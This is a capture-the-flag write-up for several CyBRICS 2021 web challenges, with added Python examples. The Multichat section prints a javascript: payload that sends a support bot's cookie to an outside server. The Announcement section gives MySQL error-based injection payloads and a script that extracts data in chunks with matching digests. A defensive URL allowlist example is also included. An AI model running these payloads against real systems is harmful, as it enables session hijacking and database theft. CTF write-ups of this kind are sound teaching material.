[toc]

Ad Network

image-20210724190509416

The challenge asks us to keep following the redirect chain for 1337 hops.

Opening the challenge:

image-20210724190445950

Looking at the page source, we find an endpoint, /adnetwork:

image-20210724190812225

Visiting /adnetwork and capturing the traffic shows that it just keeps redirecting:

image-20210724190644260

image-20210724190725167

Write a script that follows every hop by hand; after 1337 redirects we get the flag:

```python
import requests

url = "http://adnetwork-cybrics2021.ctf.su/adnetwork"
r = requests.get(url=url, allow_redirects=False)
# First hop, copied from the Location header of the response above
redirect_url = "http://how.adnetwork-cybrics2021.ctf.su/win-discover-college-responsibility/important-fine-laugh-project-movie/race-about-hit-first"
for i in range(1338):
    # allow_redirects=False: requests would otherwise give up after 30 hops
    r = requests.get(url=redirect_url, allow_redirects=False)
    try:
        redirect_url = r.headers['Location']
    except KeyError:
        # No Location header: this is the final page, which carries the flag
        print(r.text)
        break
```

# cybrics{f0lL0w_RUl3Z_F0ll0W_r3d1r3C7z}
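The script above hard-codes the first hop and stops on the first response without a Location header. The following is an added example, not code from the original write-up, showing the same manual redirect walk as a reusable function: it resolves relative Location values (which are legal and which a hard-coded absolute URL would miss), refuses loops, and counts hops. The `get` callable abstracts the transport so the chain can be exercised offline against a constructed fake server; `live_get` is the adapter for the real challenge and assumes the requests library. The host `adnetwork.example` and the flag string in the fake routes are made up for the example.

```python
from urllib.parse import urljoin

REDIRECT_CODES = {301, 302, 303, 307, 308}


def follow_redirects(get, start_url, max_hops=2000):
    """Follow a redirect chain one hop at a time.

    `get(url)` must return (status, headers, body) for a single request made
    WITHOUT automatic redirect handling (requests' own handling stops at 30 hops).
    Relative Location values are resolved against the current URL, loops are
    rejected, and (hop_count, final_url, body) is returned for the first
    non-redirect response.
    """
    url, seen = start_url, {start_url}
    for hops in range(max_hops + 1):
        status, headers, body = get(url)
        location = headers.get("Location")
        if status not in REDIRECT_CODES or not location:
            return hops, url, body
        url = urljoin(url, location)          # Location may be relative
        if url in seen:
            raise RuntimeError(f"redirect loop at {url}")
        seen.add(url)
    raise RuntimeError(f"gave up after {max_hops} redirects")


def live_get(url):
    """Adapter for a real server (assumes the requests library is installed)."""
    import requests
    r = requests.get(url, allow_redirects=False, timeout=10)
    return r.status_code, r.headers, r.text


# ---- Constructed offline stand-in for the challenge server ----
HOPS = 1337
START = "http://adnetwork.example/adnetwork"   # hypothetical host


def _build_fake_routes():
    routes, url = {}, START
    for i in range(1, HOPS + 1):
        # Alternate absolute and relative Location headers, as real servers do
        nxt = f"http://h{i}.adnetwork.example/hop/{i}" if i % 2 else f"/hop/{i}"
        routes[url] = (302, {"Location": nxt}, "")
        url = urljoin(url, nxt)
    routes[url] = (200, {}, "cybrics{constructed_flag}")   # made-up flag
    return routes


FAKE_ROUTES = _build_fake_routes()


def fake_get(url):
    """Stand-in for live_get: serves the constructed 1337-hop chain."""
    return FAKE_ROUTES[url]


if __name__ == "__main__":
    hops, final_url, body = follow_redirects(fake_get, START)
    print(hops, final_url, body)
```

Against the real challenge, call `follow_redirects(live_get, "http://adnetwork-cybrics2021.ctf.su/adnetwork")`; the hop count it returns is a quick sanity check that you actually walked the whole chain rather than stopping early on a hop that returned something other than a 3xx.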

Multichat

image-20210724210505996

The challenge is a chat room with two built-in users, Admin and Tech Support; only Tech Support can message Admin to ask for the flag.

Opening the challenge, we get a chat room implemented over WebSocket:

image-20210724210552919

After entering a room number and connecting you can send messages, but nobody replies, because you are not in the right room. In addition, the phone icon in the top-right corner lets you submit a support ticket; once you submit a link in its URL field, Tech Support will visit it. We can use the javascript: pseudo-protocol to get JavaScript executed when they do:

```javascript
javascript:fetch('http://47.xxx.xxx.72:2333', {method: 'POST', mode: 'no-cors', body: document.cookie});
```

image-20210724210237539

After submission, when Tech Support opens what we submitted, the JavaScript runs, reads their cookie and sends it to our VPS:

image-20210724210313120

The cookie is the room number. Connect to that room, impersonate Tech Support, and ask admin for the flag:

image-20210724210356479
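The bug on the ticket bot's side is that it follows whatever string the user puts in the URL field. As an added example (not code from the challenge or the write-up), here is the check a ticket-visiting bot should apply in Python: an allowlist of schemes applied after the same normalization a browser performs, alongside the substring blocklist that such bots often ship with, to show which ticket URLs the blocklist lets through. The ticket URLs in `CONSTRUCTED_TICKETS` are made up for the example; only the javascript: payload mirrors the one used above.

```python
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def naive_is_safe(url: str) -> bool:
    """Blocklist check: rejects only a literal 'javascript:' substring."""
    return "javascript:" not in url.lower()


def browser_normalize(url: str) -> str:
    """Approximate the WHATWG URL parser's pre-processing: trim leading/trailing
    C0 controls and spaces, then delete ASCII tab and newline anywhere.
    A bot that checks the raw string but then hands it to a browser is
    checking a different URL than the one the browser will load."""
    url = url.strip("".join(chr(c) for c in range(0x21)))
    return re.sub(r"[\t\n\r]", "", url)


def is_safe_url(url: str) -> bool:
    """Allowlist check: only absolute http(s) URLs with a host may be visited.
    urlsplit lowercases the scheme, so 'JavaScript:' is handled too."""
    parts = urlsplit(browser_normalize(url))
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


# Constructed ticket submissions (made up for this example)
CONSTRUCTED_TICKETS = [
    "http://example.com/help",
    "javascript:fetch('http://47.xxx.xxx.72:2333', {method: 'POST', mode: 'no-cors', body: document.cookie});",
    "JavaScript:alert(document.cookie)",
    "\tjavascript:alert(1)",          # leading tab: browsers strip it
    "java\tscript:alert(1)",          # tab inside the scheme: browsers strip it
    "//attacker.example/",            # protocol-relative: scheme inherited from the bot's page
    "data:text/html,<script>alert(1)</script>",
]


def triage(urls):
    """Return {url: (naive_verdict, allowlist_verdict)} for a list of ticket URLs."""
    return {u: (naive_is_safe(u), is_safe_url(u)) for u in urls}


if __name__ == "__main__":
    for u, (naive, strict) in triage(CONSTRUCTED_TICKETS).items():
        print(f"naive={naive!s:5} allowlist={strict!s:5} {u!r}")
```

The `java\tscript:` entry is the one worth remembering: the blocklist passes it, and the browser, after dropping the tab, executes it. Deciding by scheme allowlist after normalization leaves exactly one of the constructed tickets visitable.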

Announcement

image-20210724211228590

Not much to say about this one...

Opening the challenge, you can submit your email address:

image-20210724211258238

Enter any email address and capture the request:

image-20210724213933345

digest is the MD5 of the email value, so every injected email has to be sent with a recomputed digest. We guess that the email field is injectable:

image-20210724213908947

We get a MySQL error, and from its text we can guess the back-end SQL statement:

```sql
insert into users (email, timestamp) values ('$email', NOW());
```

Try error-based injection directly:

```sql
123' or updatexml(1,concat(0x7e,(select log from logs),0x7e),1),'1')#@qq.com
```

image-20210724215024654

Another error:

```text
Something went wrong during database insert: Incorrect datetime value: '1' for column 'timestamp' at row 1
```

So the value our payload puts in the timestamp column position is not acceptable, but we can just generate a NOW()-style datetime locally and use it in the injection:

image-20210724230351845

Construct the payload again:

```sql
123' or updatexml(1,concat(0x7e,(select log from logs),0x7e),1),'2021-07-24 21:40:39')#@qq.com
```

As shown below, the injection now executes without complaint, but nothing is echoed back:

image-20210724214633084

I don't know why; perhaps this injection point cannot echo. Moving the injection point into the timestamp field worked:

```sql
123',updatexml(1,concat(0x7e,(select log from logs),0x7e),1))#@qq.com
```

image-20210724214746455
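Two practical details are worth making explicit. First, the reason the `'123' or updatexml(...)` payloads produce no output: MySQL casts `'123'` to the integer 123, which is true, so `OR` short-circuits and `updatexml()` is never evaluated; in the timestamp position the call is the whole column value and always runs. Second, `updatexml()` reports at most 32 characters of the offending XPath, so a longer log has to be read in `substr()` slices, with the two `0x7e` markers leaving 30 characters per request. The following added example (not code from the write-up) automates that in Python: it builds each payload together with the matching md5 digest the form requires, parses the XPATH error, and walks the log slice by slice. `fake_backend` is a constructed stand-in for the challenge server that reproduces the digest check and the 32-character error truncation; `SECRET_LOG` is a made-up value, not the real flag.

```python
import hashlib
import re
from typing import Callable, Dict

# Constructed stand-in values for the offline demo
SECRET_LOG = "cybrics{constructed_flag_for_this_example_only_not_the_real_one}"
MYSQL_XPATH_LIMIT = 32   # updatexml() shows at most 32 chars of the bad XPath
CHUNK = 30               # 32 minus the two 0x7e ('~') markers


def build_body(email: str) -> Dict[str, str]:
    """The form sends digest = md5(email); an injected email needs a matching digest."""
    return {"email": email, "digest": hashlib.md5(email.encode()).hexdigest()}


def chunk_payload(start: int, length: int = CHUNK) -> str:
    """Error-based payload in the timestamp column position (the one that echoed),
    reading `length` characters of the log starting at 1-based `start`.
    Column layout follows the guessed query:
      insert into users (email, timestamp) values ('$email', NOW());"""
    return (f"123',updatexml(1,concat(0x7e,substr((select log from logs),"
            f"{start},{length}),0x7e),1))#@qq.com")


def fake_backend(body: Dict[str, str]) -> str:
    """Simulates the server: verifies the digest, then 'executes' the injected
    updatexml() by returning the MySQL-style XPATH error it would raise,
    truncated to 32 characters the way MySQL does."""
    if hashlib.md5(body["email"].encode()).hexdigest() != body["digest"]:
        return "Bad digest"
    m = re.search(r"substr\(\(select log from logs\),(\d+),(\d+)\)", body["email"])
    if not m:
        return "Something went wrong during database insert"
    start, length = int(m.group(1)), int(m.group(2))
    xpath = "~" + SECRET_LOG[start - 1:start - 1 + length] + "~"
    return f"XPATH syntax error: '{xpath[:MYSQL_XPATH_LIMIT]}'"


# Both '~' markers must be present; a truncated tail means the slice was too long
ERR_RE = re.compile(r"XPATH syntax error: '~([^~']*)~'")


def parse_chunk(response: str) -> str:
    m = ERR_RE.search(response)
    if not m:
        raise RuntimeError(f"no data in response: {response!r}")
    return m.group(1)


def extract_log(send: Callable[[Dict[str, str]], str]) -> str:
    """Walk the log CHUNK characters at a time until a short slice signals the end."""
    out, start = "", 1
    while True:
        chunk = parse_chunk(send(build_body(chunk_payload(start))))
        out += chunk
        if len(chunk) < CHUNK:
            return out
        start += CHUNK


if __name__ == "__main__":
    print(extract_log(fake_backend))
```

Against the real target, `send` would be something like `lambda body: requests.post(URL, data=body).text`, with URL being the form's action; everything else stays the same. If `logs` holds more than one row, `(select log from logs)` errors out with a subquery-returns-more-than-one-row message before `updatexml()` ever sees it, and a `limit 1` (or `group_concat`) inside the subquery is the fix.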

Checkin

image-20210724221200806